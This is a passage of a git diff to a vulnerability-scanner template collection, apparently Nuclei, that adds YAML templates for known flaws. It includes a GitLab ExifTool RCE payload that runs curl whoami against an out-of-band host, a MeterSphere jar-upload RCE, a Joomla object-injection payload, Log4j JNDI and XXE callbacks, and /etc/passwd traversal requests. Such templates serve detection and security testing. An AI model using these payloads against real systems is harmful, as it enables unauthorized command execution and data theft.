newline at end of file diff --git a/vulnerabilities/generic/request-based-interaction.yaml b/vulnerabilities/generic/request-based-interaction.yaml index dfa1de5d96..090f0108cf 100644 --- a/vulnerabilities/generic/request-based-interaction.yaml +++ b/vulnerabilities/generic/request-based-interaction.yaml @@ -5,7 +5,8 @@ info: author: pdteam severity: info description: The remote server fetched a spoofed DNS Name from the request. - reference: https://portswigger.net/research/cracking-the-lens-targeting-https-hidden-attack-surface + reference: + - https://portswigger.net/research/cracking-the-lens-targeting-https-hidden-attack-surface tags: oast,ssrf,generic requests: diff --git a/vulnerabilities/generic/top-xss-params.yaml b/vulnerabilities/generic/top-xss-params.yaml index f6cc199b5c..a9c7860d7b 100644 --- a/vulnerabilities/generic/top-xss-params.yaml +++ b/vulnerabilities/generic/top-xss-params.yaml @@ -5,9 +5,9 @@ info: author: foulenzer,geeknik severity: medium description: Searches for reflected XSS in the server response via GET-requests. - tags: xss,generic metadata: parameters: q,s,search,id,action,keyword,query,page,keywords,url,view,cat,name,key,p,month,page_id,password,terms,token,type,unsubscribe_token,api,api_key,begindate,callback,categoryid,csrf_token,email,emailto,enddate,immagine,item,jsonp,l,lang,list_type,year + tags: xss,generic requests: - method: GET diff --git a/vulnerabilities/generic/xmlrpc-pingback-ssrf.yaml b/vulnerabilities/generic/xmlrpc-pingback-ssrf.yaml index 8e99a56920..7d42755be4 100644 --- a/vulnerabilities/generic/xmlrpc-pingback-ssrf.yaml +++ b/vulnerabilities/generic/xmlrpc-pingback-ssrf.yaml @@ -3,9 +3,10 @@ id: xmlrpc-pingback-ssrf info: name: XMLRPC Pingback SSRF author: geeknik - reference: https://hackerone.com/reports/406387 severity: high - tags: ssrf,generic + reference: + - https://hackerone.com/reports/406387 + tags: ssrf,generic,xmlrpc requests: - raw: diff --git a/vulnerabilities/gitlab/gitlab-rce.yaml b/vulnerabilities/gitlab/gitlab-rce.yaml new file mode 100644 index 0000000000..dade1377d0 --- /dev/null +++ b/vulnerabilities/gitlab/gitlab-rce.yaml @@ -0,0 +1,64 @@ +id: gitlab-rce + +info: + name: GitLab CE/EE Unauthenticated RCE Using ExifTool + author: pdteam + severity: critical + description: GitLab CE/EE contains a vulnreability which allows a specially crafted image passed to a file parser to perform a command execution attack. Versions impacted are between 11.9-13.8.7, 13.9-13.9.5, and + 13.10-13.10.2. + reference: + - https://security.humanativaspa.it/gitlab-ce-cve-2021-22205-in-the-wild/ + - https://hackerone.com/reports/1154542 + - https://nvd.nist.gov/vuln/detail/CVE-2021-22205 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10.0 + cve-id: CVE-2021-22205 + cwe-id: CWE-20 + remediation: Upgrade to versions 13.10.3, 13.9.6, 13.8.8, or higher. + metadata: + shodan-query: http.title:"GitLab" + tags: cve,cve2021,gitlab,rce,oast,intrusive + +requests: + - raw: + - | + GET /users/sign_in HTTP/1.1 + Host: {{Hostname}} + Origin: {{BaseURL}} + + - | + POST /uploads/user HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryIMv3mxRg59TkFSX5 + X-CSRF-Token: {{csrf-token}} + + {{hex_decode('0D0A2D2D2D2D2D2D5765624B6974466F726D426F756E64617279494D76336D7852673539546B465358350D0A436F6E74656E742D446973706F736974696F6E3A20666F726D2D646174613B206E616D653D2266696C65223B2066696C656E616D653D22746573742E6A7067220D0A436F6E74656E742D547970653A20696D6167652F6A7065670D0A0D0A41542654464F524D000003AF444A564D4449524D0000002E81000200000046000000ACFFFFDEBF992021C8914EEB0C071FD2DA88E86BE6440F2C7102EE49D36E95BDA2C3223F464F524D0000005E444A5655494E464F0000000A00080008180064001600494E434C0000000F7368617265645F616E6E6F2E696666004247343400000011004A0102000800088AE6E1B137D97F2A89004247343400000004010FF99F4247343400000002020A464F524D00000307444A5649414E546100000150286D657461646174610A0928436F7079726967687420225C0A22202E2071787B')}}curl `whoami`.{{interactsh-url}}{{hex_decode('7D202E205C0A2220622022292029202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020200A0D0A2D2D2D2D2D2D5765624B6974466F726D426F756E64617279494D76336D7852673539546B465358352D2D0D0A')}} + + cookie-reuse: true + max-redirects: 3 + matchers-condition: and + matchers: + - type: word + words: + - 'Failed to process image' + + - type: status + status: + - 422 + + extractors: + - type: regex + name: csrf-token + internal: true + group: 1 + regex: + - 'csrf-token" content="(.*?)" />' + + - type: regex + part: interactsh_request + group: 1 + regex: + - '([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z]+)' + +# Enhanced by CS 2021/03/04 diff --git a/vulnerabilities/httpbin/httpbin-open-redirect.yaml b/vulnerabilities/httpbin/httpbin-open-redirect.yaml new file mode 100644 index 0000000000..08aff96109 --- /dev/null +++ b/vulnerabilities/httpbin/httpbin-open-redirect.yaml @@ -0,0 +1,28 @@ +id: httpbin-open-redirect + +info: + name: HTTPBin - Open Redirect + author: Adam Crosser + severity: low + reference: + - https://github.com/postmanlabs/httpbin + metadata: + shodan-query: + - html:"https://github.com/requests/httpbin" + - title:"httpbin.org" + tags: redirect,httpbin,oss + +requests: + - method: GET + path: + - "{{BaseURL}}/redirect-to?url=https%3A%2F%2Fexample.com" + + matchers-condition: and + matchers: + - type: dsl + dsl: + - 'location == "https://example.com"' + + - type: status + status: + - 302 \ No newline at end of file diff --git a/vulnerabilities/httpbin/httpbin-xss.yaml b/vulnerabilities/httpbin/httpbin-xss.yaml new file mode 100644 index 0000000000..e384b8cb83 --- /dev/null +++ b/vulnerabilities/httpbin/httpbin-xss.yaml @@ -0,0 +1,34 @@ +id: httpbin-xss + +info: + name: HTTPBin - Cross Site Scripting + author: Adam Crosser + severity: medium + reference: + - https://github.com/postmanlabs/httpbin + metadata: + shodan-query: + - html:"https://github.com/requests/httpbin" + - title:"httpbin.org" + tags: xss,httpbin,oss + +requests: + - method: GET + path: + - '{{BaseURL}}/base64/PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+' + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - '^$' + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/vulnerabilities/huawei/huawei-hg255s-lfi.yaml b/vulnerabilities/huawei/huawei-hg255s-lfi.yaml new file mode 100644 index 0000000000..71a0d509f3 --- /dev/null +++ b/vulnerabilities/huawei/huawei-hg255s-lfi.yaml @@ -0,0 +1,27 @@ +id: huawei-hg255s-lfi + +info: + name: Huawei HG255s - Directory Traversal + author: 0x_Akoko + severity: high + reference: + - https://cxsecurity.com/issue/WLB-2017090053 + - https://www.youtube.com/watch?v=n02toTFkLOU + metadata: + shodan-query: http.html:"HG532e" + tags: huawei,lfi,router + +requests: + - method: GET + path: + - "{{BaseURL}}/css/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd" + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 diff --git a/vulnerabilities/ibm/ibm-infoprint-lfi.yaml b/vulnerabilities/ibm/ibm-infoprint-lfi.yaml index 5945201731..899fad8ae8 100644 --- a/vulnerabilities/ibm/ibm-infoprint-lfi.yaml +++ b/vulnerabilities/ibm/ibm-infoprint-lfi.yaml @@ -5,8 +5,9 @@ info: author: harshbothra_ severity: medium description: Directory traversal vulnerability on IBM InfoPrint 4247-Z03 Impact Matrix Printer. - reference: https://www.exploit-db.com/exploits/47835 - tags: ibm,lfi + reference: + - https://www.exploit-db.com/exploits/47835 + tags: ibm,lfi,matrix,printer requests: - method: GET @@ -19,5 +20,5 @@ requests: - 200 - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" part: body diff --git a/vulnerabilities/ibm/ibm-websphere-ssrf.yaml b/vulnerabilities/ibm/ibm-websphere-ssrf.yaml new file mode 100644 index 0000000000..777b9a5e06 --- /dev/null +++ b/vulnerabilities/ibm/ibm-websphere-ssrf.yaml @@ -0,0 +1,29 @@ +id: ibm-websphere-ssrf + +info: + name: IBM WebSphere Portal SSRF + author: pdteam + severity: high + reference: + - https://blog.assetnote.io/2021/12/26/chained-ssrf-websphere/ + tags: ibm,ssrf,websphere + +requests: + - method: GET + path: + - '{{BaseURL}}/docpicker/internal_proxy/http/example.com' + - '{{BaseURL}}/wps/PA_WCM_Authoring_UI/proxy/http/example.com' + + redirects: true + max-redirects: 2 + stop-at-first-match: true + matchers-condition: and + matchers: + + - type: status + status: + - 200 + + - type: word + words: + - "Example Domain" \ No newline at end of file diff --git a/vulnerabilities/jamf/jamf-blind-xxe.yaml b/vulnerabilities/jamf/jamf-blind-xxe.yaml new file mode 100644 index 0000000000..4cdb45f7d2 --- /dev/null +++ b/vulnerabilities/jamf/jamf-blind-xxe.yaml @@ -0,0 +1,51 @@ +id: jamf-blind-xxe + +info: + name: JAMF Blind XXE / SSRF + author: pdteam + severity: medium + reference: + - https://www.synack.com/blog/a-deep-dive-into-xxe-injection/ + tags: xxe,ssrf,jamf + +requests: + - raw: + - | + POST /client HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/xml + + + + + + &test; + + + com.jamfsoftware.jamfdistributionserver + {{unix_time()}} + + 00000000-0000-0000-0000-000000000000 + com.jamfsoftware.jamf.distributionserverinventoryrequest + + 1999 + {{unix_time()}} + + + + 34 + + + + + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol # Confirms the DNS Interaction + words: + - "http" + + - type: word + words: + - "com.jamfsoftware.jss" \ No newline at end of file diff --git a/vulnerabilities/jamf/jamf-log4j-jndi-rce.yaml b/vulnerabilities/jamf/jamf-log4j-jndi-rce.yaml new file mode 100644 index 0000000000..b3dc039870 --- /dev/null +++ b/vulnerabilities/jamf/jamf-log4j-jndi-rce.yaml @@ -0,0 +1,39 @@ +id: jamf-log4j-jndi-rce + +info: + name: JAMF Log4j JNDI RCE + author: pdteam + severity: critical + reference: + - https://github.com/random-robbie/jamf-log4j + tags: rce,jndi,log4j,jamf + +requests: + - raw: + - | + POST / HTTP/1.1 + Host: {{Hostname}} + Origin: {{RootURL}} + Referer: {{RootURL}} + Content-Type: application/x-www-form-urlencoded + + username=${jndi:ldap://${hostName}.{{interactsh-url}}/test}&password= + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol # Confirms the DNS Interaction + words: + - "dns" + + - type: regex + part: interactsh_request + regex: + - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable + + extractors: + - type: regex + part: interactsh_request + group: 1 + regex: + - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output diff --git a/vulnerabilities/jenkins/jenkins-asyncpeople.yaml b/vulnerabilities/jenkins/jenkins-asyncpeople.yaml index 41dc0e1204..0c9a499eef 100644 --- a/vulnerabilities/jenkins/jenkins-asyncpeople.yaml +++ b/vulnerabilities/jenkins/jenkins-asyncpeople.yaml @@ -4,12 +4,12 @@ info: name: Jenkins panel async-people author: nadino severity: info - tags: jenkins reference: - https://bugs.eclipse.org/bugs/show_bug.cgi?id=564944 - https://issues.jenkins.io/browse/JENKINS-30107 - https://issues.jenkins.io/browse/JENKINS-18884 - https://issues.jenkins.io/browse/JENKINS-26469 + tags: jenkins requests: - method: GET diff --git a/vulnerabilities/jenkins/jenkins-script.yaml b/vulnerabilities/jenkins/jenkins-script.yaml index b9355903ef..aa73329709 100644 --- a/vulnerabilities/jenkins/jenkins-script.yaml +++ b/vulnerabilities/jenkins/jenkins-script.yaml @@ -4,8 +4,10 @@ info: name: Jenkins RCE due to accessible script functionality author: philippedelteil severity: critical - reference: https://hackerone.com/reports/403402 + reference: + - https://hackerone.com/reports/403402 tags: jenkins,rce,devops + requests: - method: GET path: diff --git a/vulnerabilities/jenkins/jenkins-stack-trace.yaml b/vulnerabilities/jenkins/jenkins-stack-trace.yaml index 5807e86979..88cea915bc 100644 --- a/vulnerabilities/jenkins/jenkins-stack-trace.yaml +++ b/vulnerabilities/jenkins/jenkins-stack-trace.yaml @@ -5,7 +5,8 @@ info: author: Dheerajmadhukar severity: low description: Module identified that the affected host is running an instance of Jenkins in debug mode, as a result stack traces are enabled. - reference: https://hackerone.com/reports/221833 + reference: + - https://hackerone.com/reports/221833 tags: jenkins requests: diff --git a/vulnerabilities/jira/jira-service-desk-signup.yaml b/vulnerabilities/jira/jira-service-desk-signup.yaml index dd1c371355..1cfce39b45 100644 --- a/vulnerabilities/jira/jira-service-desk-signup.yaml +++ b/vulnerabilities/jira/jira-service-desk-signup.yaml @@ -4,7 +4,7 @@ info: name: Jira Service Desk Signup author: TechbrunchFR severity: medium - tags: jira,atlassian + tags: jira,atlassian,service requests: - method: POST diff --git a/vulnerabilities/jira/jira-unauthenticated-projectcategories.yaml b/vulnerabilities/jira/jira-unauthenticated-projectcategories.yaml index 4824bb950c..ff6dcd5d49 100644 --- a/vulnerabilities/jira/jira-unauthenticated-projectcategories.yaml +++ b/vulnerabilities/jira/jira-unauthenticated-projectcategories.yaml @@ -6,7 +6,6 @@ info: severity: info tags: atlassian,jira - requests: - method: GET path: diff --git a/vulnerabilities/jira/jira-unauthenticated-screens.yaml b/vulnerabilities/jira/jira-unauthenticated-screens.yaml index 7055da97cb..11433c0ba1 100644 --- a/vulnerabilities/jira/jira-unauthenticated-screens.yaml +++ b/vulnerabilities/jira/jira-unauthenticated-screens.yaml @@ -4,7 +4,8 @@ info: name: Jira Unauthenticated Access to screens author: TESS severity: info - reference: https://developer.atlassian.com/cloud/jira/platform/rest/v2/api-group-screens/#api-rest-api-2-screens-get + reference: + - https://developer.atlassian.com/cloud/jira/platform/rest/v2/api-group-screens/#api-rest-api-2-screens-get tags: atlassian,jira requests: diff --git a/vulnerabilities/jolokia/jolokia-heap-info-disclosure.yaml b/vulnerabilities/jolokia/jolokia-heap-info-disclosure.yaml index 0336b5eaa4..41eb4ecdcf 100644 --- a/vulnerabilities/jolokia/jolokia-heap-info-disclosure.yaml +++ b/vulnerabilities/jolokia/jolokia-heap-info-disclosure.yaml @@ -4,7 +4,7 @@ info: name: Jolokia Java Heap Information Disclosure author: milo2012 severity: info - tags: jolokia,disclosure + tags: jolokia,disclosure,java requests: - raw: diff --git a/vulnerabilities/joomla/joomla-jvehicles-lfi.yaml b/vulnerabilities/joomla/joomla-jvehicles-lfi.yaml new file mode 100644 index 0000000000..ffae9984d2 --- /dev/null +++ b/vulnerabilities/joomla/joomla-jvehicles-lfi.yaml @@ -0,0 +1,30 @@ +id: joomla-jvehicles-lfi + +info: + name: Joomla! Component com_sef - Local File Inclusion + author: daffainfo + severity: high + description: A local file inclusion vulnerability in the Jvehicles (com_jvehicles) component version 1.0 for Joomla! allows remote attackers to load arbitrary files via the controller parameter in index.php. + reference: + - https://www.exploit-db.com/exploits/11997 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N + cvss-score: 8.6 + cwe-id: CWE-22 + remediation: Upgrade to a supported version. + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_jvehicles&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0" + - type: status + status: + - 200 + +# Enhanced by cs on 2022/03/25 diff --git a/vulnerabilities/joomla/rusty-joomla.yaml b/vulnerabilities/joomla/rusty-joomla.yaml new file mode 100644 index 0000000000..662a4d5b87 --- /dev/null +++ b/vulnerabilities/joomla/rusty-joomla.yaml @@ -0,0 +1,43 @@ +id: rusty-joomla + +info: + name: Rusty Joomla RCE - Unauthenticated PHP Object Injection in Joomla CMS + author: leovalcante,kiks7 + severity: critical + description: Unauthenticated PHP Object Injection in Joomla CMS from the release 3.0.0 to the 3.4.6 (releases from 2012 to December 2015) that leads to Remote Code Execution. + reference: + - https://blog.hacktivesecurity.com/index.php/2019/10/03/rusty-joomla-rce/ + - https://github.com/kiks7/rusty_joomla_rce + tags: joomla,rce,unauth,php,cms,objectinjection + +requests: + - raw: + - | + GET / HTTP/1.1 + Host: {{Hostname}} + + - | + POST / HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + username=%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0&password=AAA%22%3Bs%3A11%3A%22maonnalezzo%22%3BO%3A21%3A%22JDatabaseDriverMysqli%22%3A3%3A%7Bs%3A4%3A%22%5C0%5C0%5C0a%22%3BO%3A17%3A%22JSimplepieFactory%22%3A0%3A%7B%7Ds%3A21%3A%22%5C0%5C0%5C0disconnectHandlers%22%3Ba%3A1%3A%7Bi%3A0%3Ba%3A2%3A%7Bi%3A0%3BO%3A9%3A%22SimplePie%22%3A5%3A%7Bs%3A8%3A%22sanitize%22%3BO%3A20%3A%22JDatabaseDriverMysql%22%3A0%3A%7B%7Ds%3A5%3A%22cache%22%3Bb%3A1%3Bs%3A19%3A%22cache_name_function%22%3Bs%3A7%3A%22print_r%22%3Bs%3A10%3A%22javascript%22%3Bi%3A9999%3Bs%3A8%3A%22feed_url%22%3Bs%3A40%3A%22http%3A%2F%2Frusty.jooml%2F%3Bpkwxhxqxmdkkmscotwvh%22%3B%7Di%3A1%3Bs%3A4%3A%22init%22%3B%7D%7Ds%3A13%3A%22%5C0%5C0%5C0connection%22%3Bi%3A1%3B%7Ds%3A6%3A%22return%22%3Bs%3A102%3A&option=com_users&task=user.login&{{csrf}}=1 + + redirects: true + max-redirects: 2 + cookie-reuse: true + extractors: + - type: regex + name: csrf + part: body + internal: true + group: 1 + regex: + - "" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Undefined index: --> in file" + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 500 diff --git a/technologies/linkerd-service-detect.yaml b/vulnerabilities/linkerd/linkerd-ssrf.yaml similarity index 83% rename from technologies/linkerd-service-detect.yaml rename to vulnerabilities/linkerd/linkerd-ssrf.yaml index 3060e058eb..ec72073405 100644 --- a/technologies/linkerd-service-detect.yaml +++ b/vulnerabilities/linkerd/linkerd-ssrf.yaml @@ -4,8 +4,9 @@ info: name: Linkerd Service detection author: dudez severity: info - tags: tech,linkerd - reference: https://twitter.com/nirvana_msu/status/1084144955034165248 + reference: + - https://twitter.com/nirvana_msu/status/1084144955034165248 + tags: tech,linkerd,service requests: - method: GET @@ -29,4 +30,4 @@ requests: - '(?mi)Exceeded .*? binding timeout while resolving name' - '(?mi)exceeded .*? to unspecified while dyn binding' part: body - condition: or \ No newline at end of file + condition: or diff --git a/vulnerabilities/magento/magento-2-exposed-api.yaml b/vulnerabilities/magento/magento-2-exposed-api.yaml index a13b74936b..57e53632c6 100644 --- a/vulnerabilities/magento/magento-2-exposed-api.yaml +++ b/vulnerabilities/magento/magento-2-exposed-api.yaml @@ -5,7 +5,8 @@ info: author: TechbrunchFR severity: info description: The API in Magento 2 can be accessed by the world without providing credentials. Through the API information like storefront, (hidden) products including prices are exposed. - reference: https://support.hypernode.com/en/ecommerce/magento-2/how-to-protect-the-magento-2-api + reference: + - https://support.hypernode.com/en/ecommerce/magento-2/how-to-protect-the-magento-2-api tags: magento requests: diff --git a/vulnerabilities/magento/magento-cacheleak.yaml b/vulnerabilities/magento/magento-cacheleak.yaml index 56981148e9..f33789b6ce 100644 --- a/vulnerabilities/magento/magento-cacheleak.yaml +++ b/vulnerabilities/magento/magento-cacheleak.yaml @@ -4,7 +4,9 @@ info: name: Magento Cacheleak author: TechbrunchFR severity: high - description: Magento Cacheleak is an implementation vulnerability, result of bad implementation of web-server configuration for Magento platform. Magento was developed to work under the Apache web-server which natively works with .htaccess files, so all needed configuration directives specific for various internal Magento folders were placed in .htaccess files. When Magento is installed on web servers that are ignoring .htaccess files (such as nginx), an attacker can get access to internal Magento folders (such as the Magento cache directory) and extract sensitive information from cache files. + description: Magento Cacheleak is an implementation vulnerability, result of bad implementation of web-server configuration for Magento platform. Magento was developed to work under the Apache web-server which + natively works with .htaccess files, so all needed configuration directives specific for various internal Magento folders were placed in .htaccess files. When Magento is installed on web servers that are ignoring + .htaccess files (such as nginx), an attacker can get access to internal Magento folders (such as the Magento cache directory) and extract sensitive information from cache files. reference: - https://support.hypernode.com/en/best-practices/security/how-to-secure-magento-cacheleak - https://www.acunetix.com/vulnerabilities/web/magento-cacheleak/ diff --git a/vulnerabilities/magento/magento-unprotected-dev-files.yaml b/vulnerabilities/magento/magento-unprotected-dev-files.yaml index 7f7d1c2c47..9551d09981 100644 --- a/vulnerabilities/magento/magento-unprotected-dev-files.yaml +++ b/vulnerabilities/magento/magento-unprotected-dev-files.yaml @@ -4,8 +4,10 @@ info: name: Magento Unprotected development files author: TechbrunchFR severity: high - description: Magento version 1.9.2.x includes /dev directories or files that might reveal your passwords and other sensitive information. The /dev directories and files are not protected by default. According to Magento, "these tests are not supposed to end up on production servers". - reference: https://support.hypernode.com/en/support/solutions/articles/48001153348-how-to-secure-your-data-using-encryption-and-hashing + description: Magento version 1.9.2.x includes /dev directories or files that might reveal your passwords and other sensitive information. The /dev directories and files are not protected by default. According to + Magento, "these tests are not supposed to end up on production servers". + reference: + - https://support.hypernode.com/en/support/solutions/articles/48001153348-how-to-secure-your-data-using-encryption-and-hashing tags: magento requests: diff --git a/vulnerabilities/metersphere/metersphere-plugin-rce.yaml b/vulnerabilities/metersphere/metersphere-plugin-rce.yaml new file mode 100644 index 0000000000..86ff474427 --- /dev/null +++ b/vulnerabilities/metersphere/metersphere-plugin-rce.yaml @@ -0,0 +1,59 @@ +id: metersphere-plugin-rce + +info: + name: MeterSphere Plugin Pre-auth RCE + author: pdteam,y4er + severity: critical + reference: + - https://y4er.com/post/metersphere-plugincontroller-pre-auth-rce/ + - https://github.com/metersphere/metersphere + tags: metersphere,rce,intrusive + +requests: + - raw: + - | + POST /plugin/add HTTP/1.1 + Host: {{Hostname}} + Accept: application/json, text/plain, */* + Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryreButJNjkCniQExX + + ------WebKitFormBoundaryreButJNjkCniQExX + Content-Disposition: form-data; name="file"; filename="{{randstr}}.jar" + Content-Type: application/octet-stream + + {{base64_decode("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")}} + ------WebKitFormBoundaryreButJNjkCniQExX + Content-Disposition: form-data; name="request"; filename="blob" + Content-Type: application/json + + null + ------WebKitFormBoundaryreButJNjkCniQExX-- + + - | + POST /plugin/customMethod HTTP/1.1 + Host: {{Hostname}} + Origin: {{BaseURL}} + Content-Type: application/json + + {"entry":"Evil","request":"id"} + + matchers-condition: and + matchers: + - type: word + words: + - '"data":' + - '"success":true' + condition: and + + - type: regex + regex: + - "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)" + + - type: status + status: + - 200 + + extractors: + - type: regex + regex: + - "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)" \ No newline at end of file diff --git a/vulnerabilities/mobileiron/mobileiron-log4j-jndi-rce.yaml b/vulnerabilities/mobileiron/mobileiron-log4j-jndi-rce.yaml new file mode 